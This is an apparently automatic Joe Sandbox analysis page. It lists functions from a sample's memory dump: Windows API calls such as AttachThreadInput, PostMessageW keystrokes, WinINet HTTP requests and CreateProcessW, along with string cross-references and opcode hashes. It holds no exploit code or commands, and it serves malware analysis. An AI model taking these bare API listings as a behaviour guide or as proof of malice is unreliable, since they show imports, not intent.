Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: f491b4f89ee8632e26f84d20dd8752666e0207962aa3194d72a3f6ddf29bf021
Instruction ID: f612d4c9f2baa06bd3ba8fe0f8c7dfa19ffd47aa79319e0da94e817cf6d011cd
Opcode Fuzzy Hash: f491b4f89ee8632e26f84d20dd8752666e0207962aa3194d72a3f6ddf29bf021
Instruction Fuzzy Hash: 2CB1BD7190421A9FDB00EFA4C885BBEBBF6FF49321F244169EA01E7241D734E941CBA5

Function 006811CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 006811F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00680268,?,00000001), ref: 00681204
GetWindowThreadProcessId.USER32(00000000), ref: 0068120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00680268,?,00000001), ref: 0068121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0068122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00680268,?,00000001), ref: 00681245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00680268,?,00000001), ref: 00681257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00680268,?,00000001), ref: 0068129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00680268,?,00000001), ref: 006812B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00680268,?,00000001), ref: 006812BC

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 8f22aeb2d75270cabb6768b2dc3dd3bb082e7b0477c458e2ee5b8a55078b0ebf
Instruction ID: 7ca1d9bbf2bfb55a74aec640b8aef9240dc7115be4f71741d80460b1299135a6
Opcode Fuzzy Hash: 8f22aeb2d75270cabb6768b2dc3dd3bb082e7b0477c458e2ee5b8a55078b0ebf
Instruction Fuzzy Hash: 58319175600304FBDB60AF94EC98FA977AFEB66351F105215F904CE2A0E7B4AE818F51

Function 0062FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0062FAA6
OleUninitialize.OLE32(?,00000000), ref: 0062FB45
UnregisterHotKey.USER32(?), ref: 0062FC9C
DestroyWindow.USER32(?), ref: 006645D6
FreeLibrary.KERNEL32(?), ref: 0066463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00664668

Strings

close all, xrefs: 0062FAA1

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 231fc4aa322e44aa15ec778cefc3ff4efbeba333ba3bf8c0813735770dd9c606
Instruction ID: 8495651a29e04c506cb1d836880bd7362c8393ff07d3f73e0a17f750b0c73577
Opcode Fuzzy Hash: 231fc4aa322e44aa15ec778cefc3ff4efbeba333ba3bf8c0813735770dd9c606
Instruction Fuzzy Hash: AFA16D30701622CFDB69EF14D995AA9F766AF05700F5442BDE80AAB261CF30AD16CF94

Function 00699113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00699167
VariantInit.OLEAUT32(?), ref: 00699238
VariantInit.OLEAUT32(?), ref: 00699339
VariantClear.OLEAUT32(?), ref: 00699343
VariantClear.OLEAUT32(?), ref: 006993A0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0069931C
Null Object assignment in FOR..IN loop, xrefs: 006991C8, 006992F6, 006993AE
,,k, xrefs: 006991E5

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,k$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-852925445
Opcode ID: 3e53100ef7746a2cd85b680c76a170ec81d34c72138f4a76cdbf6ef75ce7df00
Instruction ID: c3e3d00d15a8aa567c068cc263cbca8397fabbeaa0981c6446f3f887d7966d35
Opcode Fuzzy Hash: 3e53100ef7746a2cd85b680c76a170ec81d34c72138f4a76cdbf6ef75ce7df00
Instruction Fuzzy Hash: 4F91AE71A00219ABDF24DFA9C848FEEBBBAEF45710F10811DF505AB280D7709941CFA0

Function 0067A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0067A439), ref: 0067A377

Strings

CLASSNN, xrefs: 0067A119
CLASS, xrefs: 0067A0F6
NAME, xrefs: 0067A1A9
INSTANCE, xrefs: 0067A285
TEXT, xrefs: 0067A2AE
REGEXPCLASS, xrefs: 0067A13C

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 6abf1b691990693cabb0985662c4a9bf6978af997a3c260d0f4eebdc30b7105a
Instruction ID: c7fc1a343e85d65dedc67d6e329588802d033904036ec7956b12c5702195818d
Opcode Fuzzy Hash: 6abf1b691990693cabb0985662c4a9bf6978af997a3c260d0f4eebdc30b7105a
Instruction Fuzzy Hash: D0910231A00616AADB48DFE0C441BEDFBB7BF44310F54C11DE85EA7252DB306A99CB95

Function 00622E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00622EAE

Part of subcall function 00621DB3: GetClientRect.USER32(?,?), ref: 00621DDC
Part of subcall function 00621DB3: GetWindowRect.USER32(?,?), ref: 00621E1D
Part of subcall function 00621DB3: ScreenToClient.USER32(?,?), ref: 00621E45

GetDC.USER32 ref: 0065CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0065CD45
SelectObject.GDI32(00000000,00000000), ref: 0065CD53
SelectObject.GDI32(00000000,00000000), ref: 0065CD68
ReleaseDC.USER32(?,00000000), ref: 0065CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0065CDFB

Strings

U, xrefs: 0065CCD0

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 4b4dd73ecf39930a519d32860d30aca72ce7d40189712024fbfa15b7d25dff2a
Instruction ID: a93f4bc99ea33218d924d8bfe53a1fa4929832c23f5dec1c5268534604dabc34
Opcode Fuzzy Hash: 4b4dd73ecf39930a519d32860d30aca72ce7d40189712024fbfa15b7d25dff2a
Instruction Fuzzy Hash: 6571CF31400306EFCF219F64C890AEA7BB7FF49325F14426AED969A2A6C7319C45DF60

Function 00691A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00691A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00691A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00691ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00691AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00691AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00691B10
InternetCloseHandle.WININET(00000000), ref: 00691B57

Part of subcall function 00692483: GetLastError.KERNEL32(?,?,00691817,00000000,00000000,00000001), ref: 00692498
Part of subcall function 00692483: SetEvent.KERNEL32(?,?,00691817,00000000,00000000,00000001), ref: 006924AD

Strings

, xrefs: 00691B01

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 4de799f51bcc016311ab42c433a489ebc9b11bb697f2c3b59e7a788cee283d01
Instruction ID: 4ea57015fbf4c4421d65550b5756560164c041dcb99d8b6c0d2f4eb5e113bc7d
Opcode Fuzzy Hash: 4de799f51bcc016311ab42c433a489ebc9b11bb697f2c3b59e7a788cee283d01
Instruction Fuzzy Hash: 1A4191B150121ABFEF119F50CC85FFA77AEEF0A350F10412AF9059A241E770DE418BA5

Function 00698C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,006AF910), ref: 00698D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,006AF910), ref: 00698D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00698ED6
SysFreeString.OLEAUT32(?), ref: 00698F00

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: e0988cacfd54e86b6efba6de4c7038d2c177d6bf1a29a59d720c7d8f6cdaea72
Instruction ID: af00e96fd8ddc1ee8e36e0f69ab7fd50894942f35594bfcf00f425611ff07a80
Opcode Fuzzy Hash: e0988cacfd54e86b6efba6de4c7038d2c177d6bf1a29a59d720c7d8f6cdaea72
Instruction Fuzzy Hash: 5EF1F871A00219AFDF14DF94C884EEEB7BAFF49314F108498F915AB251DB31AE46CB61

Function 0069F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0069F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0069F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0069F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0069F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0069F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0069FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0069FA7C
CloseHandle.KERNEL32(?), ref: 0069FAAB
CloseHandle.KERNEL32(?), ref: 0069FB22

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: d465d38050035145f22d797057e2e325071d4b2b81064cfb42bd722de0a14a0b
Instruction ID: 1eac02ea195460dbf10ae0444e805345b16b20f1d388b002b4c8c3e465ae89fd
Opcode Fuzzy Hash: d465d38050035145f22d797057e2e325071d4b2b81064cfb42bd722de0a14a0b
Instruction Fuzzy Hash: 15E1B0316043019FCB54EF24D891BAABBE6AF85314F19896DF8998B3A1CB31DC41CF56

Function 00684CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0068466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00683697,?), ref: 0068468B

Part of subcall function 0068466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00683697,?), ref: 006846A4

Part of subcall function 00684A31: GetFileAttributesW.KERNEL32(?,0068370B), ref: 00684A32

lstrcmpiW.KERNEL32(?,?), ref: 00684D40
_wcscmp.LIBCMT ref: 00684D5A
MoveFileW.KERNEL32(?,?), ref: 00684D75

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 65f2a672957e7ea385fa89991725eac393ce778459634d8c5bb6d71cd3b51fe4
Instruction ID: f6e2b6874fb23bde898edc479da29f06f4bcbb81088daf9945489319ebe0e7b3
Opcode Fuzzy Hash: 65f2a672957e7ea385fa89991725eac393ce778459634d8c5bb6d71cd3b51fe4
Instruction Fuzzy Hash: 1C5187B24083859BC764EBA0D881DDFB3EDAF85310F500A2EF685D3151EF74A588CB5A

Function 006A8645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 006A86FF

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 88f7fde47124cced06e0b3503ef24921a874e27b7e4510a2d500246e2889aa04
Instruction ID: a1faca57113cd3f97a0d717f3d21765ea5ef8c8edd7fca362705341e8a0ee480
Opcode Fuzzy Hash: 88f7fde47124cced06e0b3503ef24921a874e27b7e4510a2d500246e2889aa04
Instruction Fuzzy Hash: 67517B30500254BEEB24BB289C85FAD7BA7AB06320F601125F951E72A1CF76EE808E55

Function 00622B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0065C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0065C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0065C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0065C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0065C370
DestroyIcon.USER32(00000000), ref: 0065C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0065C39C
DestroyIcon.USER32(?), ref: 0065C3AB

Part of subcall function 006AA4AF: DeleteObject.GDI32(00000000), ref: 006AA4E8

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 70edf9b6234db174358264278c0ed13edb24c71220aa4ce35426f3699bf71b02
Instruction ID: d71381f5483d9819dcc2dea353b26732c86c2dc0cf07c25f0f25514785ef602d
Opcode Fuzzy Hash: 70edf9b6234db174358264278c0ed13edb24c71220aa4ce35426f3699bf71b02
Instruction Fuzzy Hash: 69516A70A0071AAFDB20DF64DC55FAA3BA6EB09326F104528F902972A0DB70ED91DF50

Function 0067966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0067A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0067A84C
Part of subcall function 0067A82C: GetCurrentThreadId.KERNEL32 ref: 0067A853
Part of subcall function 0067A82C: AttachThreadInput.USER32(00000000,?,00679683,?,00000001), ref: 0067A85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 0067968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006796AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 006796AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 006796B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 006796D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006796D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 006796E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 006796F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006796FB

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: e981f5e43a7dcf7e82743690ff60cff511a8ddb32bacf0f534beae29329aa034
Instruction ID: 3cb106413be801f00b4312ad8b1d919fd7d863c7ab0b6f87d6454ceca986b2b5
Opcode Fuzzy Hash: e981f5e43a7dcf7e82743690ff60cff511a8ddb32bacf0f534beae29329aa034
Instruction Fuzzy Hash: F911E571910618BEF7106FA0DC89F6A3B1EEB4D750F102429F244AB0E0C9F26C11DEA9

Function 00678921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0067853C,00000B00,?,?), ref: 0067892A
HeapAlloc.KERNEL32(00000000,?,0067853C,00000B00,?,?), ref: 00678931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0067853C,00000B00,?,?), ref: 00678946
GetCurrentProcess.KERNEL32(?,00000000,?,0067853C,00000B00,?,?), ref: 0067894E
DuplicateHandle.KERNEL32(00000000,?,0067853C,00000B00,?,?), ref: 00678951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0067853C,00000B00,?,?), ref: 00678961
GetCurrentProcess.KERNEL32(0067853C,00000000,?,0067853C,00000B00,?,?), ref: 00678969
DuplicateHandle.KERNEL32(00000000,?,0067853C,00000B00,?,?), ref: 0067896C
CreateThread.KERNEL32(00000000,00000000,00678992,00000000,00000000,00000000), ref: 00678986

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: c2156b1f92b0f8bfaee2774497119548efec9120d9ab7721abceb1ef40d12b6a
Instruction ID: c313141eab276b7832f91a906c1ed67f2edbd01856eecead618dd4cb0ee5c89d
Opcode Fuzzy Hash: c2156b1f92b0f8bfaee2774497119548efec9120d9ab7721abceb1ef40d12b6a
Instruction Fuzzy Hash: 2C01A8B5240308FFE760ABA5DC4DF6B3BADEB89711F419421FA05DB1A1DA70AC008E21

Function 00699B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00699BA4, 00699EC8
Not an Object type, xrefs: 00699B7B

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 3231d2c2e6eb59f3d70e0ae00b636aeed5fad323149f160ca0934e079561add3
Instruction ID: 0b6ec4045dcc875dff60abea84fb2b234c6ee714e91b5a1d8f14807f0d405c14
Opcode Fuzzy Hash: 3231d2c2e6eb59f3d70e0ae00b636aeed5fad323149f160ca0934e079561add3
Instruction Fuzzy Hash: 89C18171A0021A9BDF14DF98D884AEEB7FAFF48314F14846DE905A7781E770AD45CBA0

Function 0069975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 0067710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00677044,80070057,?,?,?,00677455), ref: 00677127
Part of subcall function 0067710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00677044,80070057,?,?), ref: 00677142
Part of subcall function 0067710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00677044,80070057,?,?), ref: 00677150
Part of subcall function 0067710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00677044,80070057,?), ref: 00677160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00699806
_memset.LIBCMT ref: 00699813
_memset.LIBCMT ref: 00699956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00699982
CoTaskMemFree.OLE32(?), ref: 0069998D

Strings

NULL Pointer assignment, xrefs: 006999DB

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
